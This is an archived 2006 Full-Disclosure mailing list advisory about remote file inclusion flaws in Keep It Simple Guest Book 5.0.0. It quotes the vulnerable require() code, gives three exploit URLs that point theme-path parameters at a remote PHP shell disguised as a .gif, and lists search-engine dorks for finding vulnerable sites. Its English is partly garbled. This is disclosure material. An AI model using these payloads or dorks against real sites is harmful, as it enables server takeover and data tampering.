lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <558f59870612221255s506cfc28j46690c823bb16b86@mail.gmail.com>
Date: Fri, 22 Dec 2006 21:55:17 +0100
From: "0o_zeus_o0 elitemexico.org" <zeus.olimpusklan@...il.com>
To: bugtraq@...e-h.org, bugtraq@...urityfocus.com, org@...urity.nnov.ru, 
	full-disclosure@...ts.grok.org.uk, admin@...e-h.org, 
	vuln@...unia.com, submit@...w0rm.com
Subject: Multiple Remote Vulnerabilities in KISGB

###########################################################################
# Advisory #15 Title: Multiple Remote Vulnerabilities in KISGB
#
# Author: 0o_zeus_o0 ( Arturo Z. )
# Contact: zeus@...sdelared.com
# Website: www.diosdelared.com
# Date: 22/12/06
# Risk: critical
# Vendor Url: http://sourceforge.net/projects/kisgb,
http://ravenphpscripts.com
# Affected Software: Keep It Simple Guest Book
# search: inurl:kisgb , intitle:KISGB
#
#Info:
##################################################################
#Bug is risky by since it is possible to be included I cosay malisioso
#that allows to see or to modify the archives
#code:
#if (isset($default_path_for_themes))
require("$default_path_for_themes/$theme");
#else require("$path_to_themes/$theme");
##################################################################
#
#
#http://site/path/gbpath/authenticate.php?path_to_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/admin.php?default_path_for_themes=
http://shellsite.com/php.gif?
#
#http://site/path/gbpath/upconfig.php?default_path_for_themes=
http://shellsite.com/php.gif?
##################################################################
#VULNERABLE VERSIONS
##################################################################
# 5.0.0
#
##################################################################
#Contact information
#0o_zeus_o0
#zeus@...sdelared.com
#www.diosdelared.com
##################################################################
#greetz: S.S.M, sams, a mi beba
#Original Advisory: http://diosdelared.com/15.txt
##################################################################

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ